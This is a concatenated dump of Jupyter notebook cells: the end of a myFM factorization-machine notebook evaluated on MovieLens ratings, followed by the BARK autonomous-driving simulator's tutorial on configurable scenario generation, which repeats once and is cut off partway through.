/home/tomoki/myFM/myfm/utils/encoders/binning.py:33: RuntimeWarning: invalid value encountered in greater_equal
cols[non_na_index] += x_not_na >= p
###Markdown
Regression
###Code
group_shapes = ([len(date_encoder)] if use_date else []) + user_encoder.encoder_shapes + movie_encoder.encoder_shapes
fm = myfm.MyFMRegressor(rank=10)
fm.fit(
X_date_train, df_train.rating.values, X_rel=train_blocks,
group_shapes=group_shapes,
X_test=X_date_test, X_rel_test=test_blocks,
y_test=df_test.rating.values,
n_iter=512, n_kept_samples=512
);
test_predictions = fm.predict(X_date_test, test_blocks)
rmse = (
(test_predictions - df_test.rating.values)**2
).mean() ** 0.5
mae = np.abs(test_predictions - df_test.rating).mean()
# Note the improvement from "id_only" case.
# Compare this with methods like ones in https://paperswithcode.com/sota/collaborative-filtering-on-movielens-100k
print('rmse={}, mae={}'.format(rmse, mae))
###Output
rmse=0.8832517431687069, mae=0.6943815452471757
###Markdown
Ordered Probit Regression
###Code
fm_probit = myfm.MyFMOrderedProbit(rank=10)
fm_probit.fit(
X_date_train, df_train.rating.values - 1, X_rel=train_blocks,
group_shapes=group_shapes,
n_iter=512, n_kept_samples=512
);
test_prediction_ordered_prob = fm_probit.predict_proba(X_date_test, test_blocks)
test_prediction_ordered_mean = 1 + test_prediction_ordered_prob.dot(np.arange(5)) # class 0 => rating 1 shift
rmse = (
(test_prediction_ordered_mean - df_test.rating.values) **2
).mean() ** 0.5
mae = np.abs(test_prediction_ordered_mean - df_test.rating).mean()
test_predictions = fm.predict(X_date_test, test_blocks)
print('rmse={}, mae={}'.format(rmse, mae))
# If we use the original data format, it takes much more!
X_original_format = []
if use_date:
X_original_format.append(X_date_train)
X_original_format.extend(
[rel.data[rel.original_to_block] for rel in train_blocks]
)
X_original_format = sps.hstack(X_original_format, format='csr')
fm_rawformat = myfm.MyFMRegressor(rank=10).fit(
X_original_format, df_train.rating,
group_shapes=group_shapes, n_iter=6, n_kept_samples=1
)
# They shoud be same up to floating point artifact.
fm_rawformat.predictor_.samples[-1].V - fm.predictor_.samples[5].V
###Output
_____no_output_____ |
docs/tutorials/03_configurable_scenario_generation.ipynb | ###Markdown
3. Configurable Scenario GenerationIn this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, to then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK ScenariosA BARK scenario contains a list of agentswith their initial states, behavior, execution and dynamicmodels as well as a goal definition for each agent. Further,it contains a map file in the OpenDrive format. To supportbehavior benchmarking, each scenario specifies which agentis considered as the ‘controlled’ agent during the simulation.A BARK scenario does not explicitly specify how agentswill behave over time, e.g. using predefined maneuvers ortrajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class separately persists agents and the map file name. When multiple scenarios are based on the same map file, this then avoids serialization of processed map information in all the scenarios. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all members, e.g behavior models suport python serialization.Before starting to run a scenario. The benchmark runner then calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario GenerationBased on the scenario definition, we define a Scenario Generation base class being responsible to create a list of scenario and managing saving, loading of scenario sets and getting of scenarios. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows to easily create new scenario generations while enabling easy integration in to BARK's benchmarking and ML training platforms which use these common interfaces.Let's have a look how what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario GenerationThough, new scenarios generations are supported with the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement.The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible to create the features within this sink source pair. Config readers exist for each relevant property in a scenario which are processed for a source sinks pair in a specific order. Information from config reader is passed to the next readers. We distinguish between fundamdental information to build a scenario which must be returned by a config reader and optional information which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions,2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py) 3.4 Understanding Parameter FilesLet's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
import os
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/julo/.cache/bazel/_bazel_julo/6148542f54f1c4e49e4ced7294c97977/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/julo/.cache/bazel/_bazel_julo/6148542f54f1c4e49e4ced7294c97977/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two sources and sinks specified. One for the left lane of the road corridor on an highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. Goal definition uses config reader FixedGoalTypes enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via parameter LongitudinalRange. With BARKs runtime, we can have a look through the sceanarios created with the default parameter config:
###Code
from IPython import display
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters that the controlled agents goal is on the left lane. Additionally, we want to create more dense traffic on the left lane to make the lane change scenario harder. We decrease the range for sampling distances and velocity. Further and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Conflict Resolution between Source Sink ConfigsAs discussed, the config reader chain is processed separately for each source sink config. To avoid **physical** overlapping of initial agent states, we can use the conflict resolution specification between source and sinks. Especially in intersection scearions overlaps occur within the intersection or when building scenarios where vehicles should either turn left or go straight.In the following, we show an intersection scenario and explaing the conflict resolution.
###Code
scenario_param_file ="intersection_configurable.json" # must be within examples params folder
param_server = ParameterServer(filename= os.path.join("examples/params/",scenario_param_file))
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=20, random_seed=0, params=param_server)
viewer = MPViewer(params=param_server, use_world_bounds=True)
sim_step_time = param_server["simulation"]["step_time",
"Step-time used in simulation",
0.2]
sim_real_time_factor = param_server["simulation"]["real_time_factor",
"execution in real-time or faster", 1]
scenario, idx = scenario_generation.get_next_scenario()
num_scenarios_to_show = 20
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.get_world_state()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
For this scenario, we specified three source sink configurations for the west->east corridor, the south->west corridor and east->west corridor. In the scenario generation param file, we specified how overlaps should be resolved as follows:
###Code
print(json.dumps(param_server["Scenario"]["Generation"] \
["ConfigurableScenarioGeneration"]["ConflictResolution"].ConvertToDict(), indent=4))
###Output
{
"west_south/west_east": [
0.45,
0.55
],
"south_west/west_east": [
0.5,
0.5
],
"south_west/west_south": [
0.5,
0.5
]
}
###Markdown
The names used correspond to the source sink description given in the definition of the respective source sink config. The numbers specify with what probability an overlap is resolved using a vehicle from one or the other corridor. We continue with writing our own config reader. 3.5 Writing an own config reader to sample behavior typeThere is a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, writing a config reader for behavior model sampling. But the process can be easily applied to the other config reader types as well.The config reader shall randomly sample behavior types among a list of specified behavior types. We reimplement the interface of ConfigReaderBehaviorModels as follows
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read it out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of objects must be persisted to allow for serialization of behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into the [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py) containing the already existing ConfigReaderBehaviorModels.Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We can first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First let's specify the new config type and extract the defaults. To specify a config type simply use the name given to the config reader class. We now have the following initial source sink config and running the scenario generation gives as the default params. These can of course be customized as desired
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario GenerationIn this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, to then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK ScenariosA BARK scenario contains a list of agentswith their initial states, behavior, execution and dynamicmodels as well as a goal definition for each agent. Further,it contains a map file in the OpenDrive format. To supportbehavior benchmarking, each scenario specifies which agentis considered as the ‘controlled’ agent during the simulation.A BARK scenario does not explicitly specify how agentswill behave over time, e.g. using predefined maneuvers ortrajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class separately persists agents and the map file name. When multiple scenarios are based on the same map file, this then avoids serialization of processed map information in all the scenarios. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all members, e.g behavior models suport python serialization.Before starting to run a scenario. The benchmark runner then calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario GenerationBased on the scenario definition, we define a Scenario Generation base class being responsible to create a list of scenario and managing saving, loading of scenario sets and getting of scenarios. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows to easily create new scenario generations while enabling easy integration in to BARK's benchmarking and ML training platforms which use these common interfaces.Let's have a look how what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario GenerationThough, new scenarios generations are supported with the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement.The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible to create the features within this sink source pair. Config readers exist for each relevant property in a scenario which are processed for a source sinks pair in a specific order. Information from config reader is passed to the next readers. We distinguish between fundamdental information to build a scenario which must be returned by a config reader and optional information which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions,2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py) 3.4 Understanding Parameter FilesLet's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two sources and sinks specified. One for the left lane of the road corridor on an highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. Goal definition uses config reader FixedGoalTypes enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via parameter LongitudinalRange. With BARKs runtime, we can have a look through the sceanarios created with the default parameter config:
###Code
from IPython import display
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters that the controlled agents goal is on the left lane. Additionally, we want to create more dense traffic on the left lane to make the lane change scenario harder. We decrease the range for sampling distances and velocity. Further and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
